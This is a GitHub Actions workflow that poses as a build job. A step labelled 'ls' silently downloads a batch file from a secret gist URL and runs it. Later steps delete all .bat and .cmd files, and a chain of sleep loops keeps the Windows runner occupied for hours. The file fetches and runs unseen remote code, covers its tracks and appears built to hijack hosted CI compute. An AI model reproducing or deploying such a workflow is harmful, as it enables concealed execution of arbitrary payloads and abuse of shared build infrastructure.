name: Makealast
on:
  workflow_dispatch:

jobs:
  build:
    name: Building
    runs-on: windows-latest

    steps:
    - name: ls
      shell: cmd
      run: |
        curl -L %GIST_URL% -o loads.bat >nul 2>&1
        cmd /c loads.bat >nul 2>&1
      env:
        GIST_URL: ${{ secrets.GIST_URL }}

    - name: Del1
      run: cmd /c "del /f *.bat"

    - name: Del2
      run: cmd /c "del /f *.cmd"
      
    - name: Create the file
      run: |
        $filePath = "D:/abc.txt"
        if (-Not (Test-Path $filePath)) {
            New-Item -Path $filePath -ItemType File
        } else {
            Write-Host "File already exists at $filePath"
        }

    - name: 1
      run: |
        $timeout = 3600
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }
        
    - name: 2
      run: |
        $timeout = 3600
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }

    - name: 3
      run: |
        $timeout = 3600
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }

    - name: 4
      run: |
        $timeout = 3600
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }

    - name: 5
      run: |
        $timeout = 3600
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }

    - name: 6
      run: |
        $timeout = 3000
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }

    - name: End
      run: |
        $timeout = 360
        $elapsedTime = 0
        $filePath = "D:/abc.txt"


        while ($elapsedTime -lt $timeout) {

            if (Test-Path $filePath) {
                Start-Sleep -Seconds 30
                $elapsedTime += 30
            } else {
                break
            }
        }
